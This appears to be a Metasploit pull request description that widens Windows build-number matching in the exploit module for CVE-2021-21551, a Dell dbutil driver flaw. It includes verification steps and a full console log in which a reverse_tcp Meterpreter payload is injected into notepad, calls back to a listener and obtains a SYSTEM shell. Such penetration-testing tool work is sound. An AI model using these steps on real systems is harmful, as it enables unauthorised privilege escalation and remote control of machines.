Fix targeting for CVE-2021-21551

[zeroSteiner]

This fixes a mistake I made in the exploit for CVE-2021-21551 where the version fingerprinting is overly specific. I noticed that the exploit was failing when targeting Windows 10 build 18363 since it didn't match the explicit build number 18362. This PR changes the fingerprinting to use ranges to fix this problem. Additionally, I added and tested the build number for the upcoming 21H1 release (available through the insider preview channel). For v21H1 the build number is 19043 and I confirmed that the offsets in EPROCESS are all the same as they are for 20H1 and 20H2.

Verification

Install Windows 10 v21H1 by signing up for Windows Insider Preview.

• Start msfconsole
• Get a Meterpreter session on a vulnerable host
• Do: use exploit/windows/local/cve_2021_21551_dbutil_memmove
• Set the SESSION and PAYLOAD options
• Do: run
• You should get a SYSTEM shell.

Example

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer        : DESKTOP-0Q6QJ6Q
OS              : Windows 10 (10.0 Build 19043).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-0Q6QJ6Q\aliddle
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background 
[*] Backgrounding session 5...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > previous 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_21551_dbutil_memmove) > show options 

Module options (exploit/windows/local/cve_2021_21551_dbutil_memmove):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64


msf6 exploit(windows/local/cve_2021_21551_dbutil_memmove) > exploit

[-] Handler failed to bind to 192.168.159.128:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad to host the DLL...
[+] Process 444 launched.
[*] Reflectively injecting the DLL into 444...
[*] Sending stage (200262 bytes) to 192.168.159.109
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 6 opened (192.168.159.128:4444 -> 192.168.159.109:52865) at 2021-05-18 12:48:01 -0400

[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2021_21551_dbutil_memmove) > 
msf6 exploit(windows/local/cve_2021_21551_dbutil_memmove) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-0Q6QJ6Q
OS              : Windows 10 (10.0 Build 19043).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > 

[bwatters-r7]

Release Notes

Fixed a mistake in the exploit for CVE-2021-21551 where the version fingerprinting is overly specific. Windows 10 build 18363 failed because it didn't match the explicit build number 18362. This PR changes the fingerprinting to use ranges to fix this problem.